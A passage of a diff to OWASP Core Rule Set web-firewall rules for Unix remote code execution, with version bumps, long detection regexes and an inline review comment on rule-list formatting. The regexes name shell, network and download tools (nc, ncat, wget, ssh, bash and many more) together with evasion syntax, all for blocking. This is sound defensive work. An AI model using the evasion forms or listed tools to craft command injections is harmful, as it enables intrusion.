\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\
||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7z[arx]?|(?:GE|POS)T|y(?:e(?:s|lp)|um|arn)|HEAD)[\s\x0b&\),<>\|]|a(?:a-[^\s\x0b]{1,10}\b|(?:b|w[ks]|l(?:ias|pine)|tobm|xel)[\s\x0b&\),<>\|]|p(?:t(?:[\s\x0b&\),<>\|]|-get)|parmor_[^\s\x0b]{1,10}\b)|r(?:(?:p|ch)?[\s\x0b&\),<>\|]|j(?:[\s\x0b&\),<>\|]|-register|disp)|ia2c)|s(?:h[\s\x0b&\),<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))[\s\x0b&\),<>\|]|diff|e(?:grep|xe[\s\x0b&\),<>\|])|f?grep|ip2(?:[\s\x0b&\),<>\|]|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\),<>\|]|c))|h[\s\x0b&\),<>\|])|tch[\s\x0b&\),<>\|])|lkid[\s\x0b&\),<>\|]|pftrace|r(?:eaksw|(?:idge|wap)[\s\x0b&\),<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\),<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu[\s\x0b&\),<>\|]))|c(?:[89]9(?:[\s\x0b&\),<>\|]|-gcc)|(?:a(?:t|ncel|psh)|c|mp)[\s\x0b&\),<>\|]|p(?:(?:an|io)?[\s\x0b&\),<>\|]|ulimit)|s(?:(?:h|cli)[\s\x0b&\),<>\|]|plit|vtool)|u(?:t[\s\x0b&\),<>\|]|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)[\s\x0b&\),<>
\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\),\-<>\|])|(?:flag|pas)s|g(?:passwd|rp[\s\x0b&\),<>\|]))|lang(?:\+\+|[\s\x0b&\),<>\|])|o(?:bc(?:[\s\x0b&\),<>\|]|run)|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\),<>\|]|proc|w(?:say|think))|r(?:ash[\s\x0b&\),<>\|]|on(?:[\s\x0b&\),<>\|]|tab)))|d(?:(?:[dfu]|i(?:(?:alo)?g|r|ff)|a(?:sh|te)|vips)[\s\x0b&\),<>\|]|hclient|m(?:esg[\s\x0b&\),<>\|]|idecode|setup)|o(?:(?:as|ne)[\s\x0b&\),<>\|]|cker[\s\x0b&\),\-<>\|]|sbox)|pkg[\s\x0b&\),\-<>\|])|e(?:(?:[bd]|qn|s(?:h|ac)?|cho|fax|grep|macs|val)[\s\x0b&\),<>\|]|n(?:v(?:[\s\x0b&\),<>\|]|-update)|d(?:if|sw)[\s\x0b&\),<>\|])|x(?:(?:ec|p(?:and|(?:ec|or)t|r))?[\s\x0b&\),<>\|]|iftool)|2fsck|asy_install)|f(?:(?:c|g(?:rep)?|mt|etch|lock|unction)[\s\x0b&\),<>\|]|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\),<>\|]|le(?:[\s\x0b&\),<>\|]|test))|tp(?:[\s\x0b&\),<>\|]|stats|who)|acter|d(?:(?:find|isk)[\s\x0b&\),<>\|]|u?mount)|o(?:ld[\s\x0b&\),<>\|]|reach)|ping[\s\x0b&\),6<>\|])|g(?:c(?:c[^\s\x0b]{1,10}\b|ore[\s\x0b&\),<>\|])|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))[\s\x0b&\),<>\|]|e(?:m[\s\x0b&\),<>\|]|ni(?:e[\s\x0b&\),<>\|]|soimage)|t(?:cap|facl[\s\x0b&\),<>\|]))|hc(?:-?[\s\x0b&\),<>\|]|i[\s\x0b&\),\-<>\|])|r(?:(?:c(?:at)?|ep)[\s\x0b&\),<>\|]|oupmod)|tester|unzip)|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\),<>\|]|e(?:ad[\s\x0b&\),<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op[\s\x0b&\),<>\|]|passwd))|i(?:(?:d|rb|conv|nstall)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|6?tables|config|p(?:eveprinter|find|tool))|f(?:config|top[\s\x0b&\),<>\|])|onice|spell)|j(?:(?:js|q|ava|exec)[\s\x0b&\),<>\|]|o(?:(?:bs|in)[\s\x0b&\),<>\|]|urnalctl)|runscript)|k(?:s(?:h[\s\x0b&\),<>\|]|shell)|ill(?:[\s\x0b&\),<>\|]|all)|nife[\s\x0b&\),<>\|])|l(?:d(?:d?[\s\x0b&\),<>\|]|config)|(?:[np]|ynx)[\s\x0b&\),<>\|]|s(?:(?:-F|cpu|hw|mod|of|pci|usb)?[\s\x0b&\),<>\|]|b_release)|ua(?:[\s\x0b&\),<>\|]|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|c(?:[\s\x0b&\),<>\|]|at))|(?:c(?:at|mp))?[\s\x0b&\),<>\|]|diff|[ef]?grep|
less|m(?:a(?:[\s\x0b&\),<>\|]|dec|info)|ore))|a(?:st(?:(?:comm)?[\s\x0b&\),<>\|]|log(?:in)?)|tex[\s\x0b&\),<>\|])|ess(?:[\s\x0b&\),<>\|]|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|get)|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\),<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:(?:a(?:n|il[qx]?|ke|wk)|tr|v|utt)[\s\x0b&\),<>\|]|k(?:(?:dir|nod)[\s\x0b&\),<>\|]|fifo|temp)|locate|o(?:squitto|unt[\s\x0b&\),<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:(?:at)?[\s\x0b&\),<>\|]|\.(?:openbsd|traditional))|e(?:t(?:[\s\x0b&\),<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|m(?:ap)?|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)[\s\x0b&\),<>\|]|s(?:enter|lookup|tat[\s\x0b&\),<>\|]))|o(?:(?:d|ctave)[\s\x0b&\),<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg[\s\x0b&\),<>\|]))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\),<>\|]|s(?:swd|te[\s\x0b&\),<>\|]))|d(?:b(?:[\s\x0b&\),<>\|]|2mb|3[\s\x0b&\),\.<>\|])|f(?:la)?tex|ksh[\s\x0b&\),<>\|])|(?:f(?:tp)?|g(?:rep)?|(?:w|op)d|xz|u(?:ppet|shd))[\s\x0b&\),<>\|]|hp(?:[57]?[\s\x0b&\),<>\|]|-cgi)|i(?:(?:co?|gz|ng6?)[\s\x0b&\),<>\|]|p(?:[\s\x0b&\),<>\|]|[^\s\x0b]{1,10}\b)|dstat)|k(?:g(?:[\s\x0b&\),<>\|]|_?info)|exec|ill[\s\x0b&\),<>\|])|r(?:y?[\s\x0b&\),<>\|]|int(?:env|f[\s\x0b&\),<>\|]))|t(?:x[\s\x0b&\),<>\|]|ar(?:[\s\x0b&\),<>\|]|diff|grep))|er(?:(?:f|ms)[\s\x0b&\),<>\|]|l(?:5?[\s\x0b&\),<>\|]|sh))|s(?:(?:ed|ql)[\s\x0b&\),<>\|]|ftp)|y(?:3?versions|thon[23]))|r(?:(?:a(?:r|k[eu])|cp?|bash|nano|oute|vi(?:ew|m))[\s\x0b&\),<>\|]|e(?:(?:d(?:carpet)?|v|boot|name|p(?:eat|lace))[\s\x0b&\),<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\),<>\|]|t(?:[\s\x0b&\),<>\|]|-(?:dump|tar))|user)|pm(?:(?:db)?[\s\x0b&\),<>\|]|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|])|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c[\s\x0b&\),<>\|])))|s(?:(?:c(?:p|hed|r(?:een|ipt))|g|ash|diff|ftp|l(?:eep|sh)|plit)[\s\x0b&\),<>\|]|e(?:(?:d|ndmail|rvice)[\s\x0b&\),<>\|]|t(?:(?:facl)?[\s\x0b&\),<
>\|]|arch|cap|env|sid))|h(?:(?:u(?:f|tdown))?[\s\x0b&\),<>\|]|\.distrib)|s(?:[\s\x0b&\),<>\|]|h(?:[\s\x0b&\),<>\|]|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass))|u(?:[\s\x0b&\),<>\|]|do(?:-rs|[\s\x0b&\),<>_\|]|edit|replay))|vn(?:[\s\x0b&\),<>\|]|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:(?:(?:ca|r)t|urce)[\s\x0b&\),<>\|]|elim)|qlite3|t(?:art-stop-daemon|dbuf|r(?:ace|ings[\s\x0b&\),<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:(?:[cr]|ilf?)[\s\x0b&\),<>\|]|sk(?:[\s\x0b&\),<>\|]|set))|(?:bl|o(?:p|uch)|ftp|mux)[\s\x0b&\),<>\|]|e(?:[ex][\s\x0b&\),<>\|]|lnet)|i(?:c[\s\x0b&\),<>\|]|me(?:datectl|out[\s\x0b&\),<>\|]))|c(?:l?sh[\s\x0b&\),<>\|]|p(?:dump|ing|traceroute))|r(?:a(?:ceroute6?|p[\s\x0b&\),<>\|])|off[\s\x0b&\),<>\|])|shark)|u(?:l(?:imit)?[\s\x0b&\),<>\|]|n(?:(?:ame|compress|iq|rar|s(?:et|hare)|xz)[\s\x0b&\),<>\|]|expand|l(?:ink[\s\x0b&\),<>\|]|z(?:4[\s\x0b&\),<>\|]|ma))|pigz|z(?:ip[\s\x0b&\),<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\),<>\|]|diff)|(?:[ep]w|gr|rsh)[\s\x0b&\),<>\|]|sudo(?:-rs)?)|algrind|olatility[\s\x0b&\),<>\|])|w(?:(?:c|a(?:ll|tch))[\s\x0b&\),<>\|]|h(?:iptail[\s\x0b&\),<>\|]|o(?:ami|is[\s\x0b&\),<>\|]))|i(?:reshark|sh[\s\x0b&\),<>\|]))|x(?:(?:(?:x|pa)d|args|term)[\s\x0b&\),<>\|]|z(?:(?:c(?:at|mp))?[\s\x0b&\),<>\|]|d(?:ec[\s\x0b&\),<>\|]|iff)|[ef]?grep|less|more)|e(?:latex|tex[\s\x0b&\),<>\|])|mo(?:dmap|re[\s\x0b&\),<>\|]))|z(?:ip(?:[\s\x0b&\),<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h[\s\x0b&\),<>\|]|oelim|td(?:[\s\x0b&\),<>\|]|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)[\s\x0b&\),<>\|]|[ef]grep|mo(?:dload|re[\s\x0b&\),<>\|])|ypper))" \ "id:932239,\ phase:1,\ block,\ 
@@ -1663,7 +1741,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx (?i)(?:^|b[\"'\) tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1698,14 +1776,14 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@pmFromFile unix-she tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # 
@@ -1723,6 +1801,8 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'O # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, 
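Review bot: The two added entries break the conventions of the list they join: every neighbouring entry writes the paranoia level as `PL1`/`PL2` (e.g. `.932250 (base rule, PL1, …)`), while the new lines write `PL-1` and `PL-3`, and the list is grouped by level (PL1 rules first, the PL2 siblings after the blank `#` line), so a PL3 entry placed among the PL1 rules is out of sequence. I would write `# .932340 (PL1, matches commands with no arguments)` in the PL1 group and move `# .932350 (PL3, matches commands with no arguments)` below the PL2 entries. The same pair of lines is added in the hunk `@@ -1780,6 +1860,8 @@` further down and should be adjusted there too.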
@@ -1748,7 +1828,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,tag:'O # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932232 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\
||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?2[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&
&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s)|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o|(?:[\s\x0b&\),<>\|]|$).*))\b" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*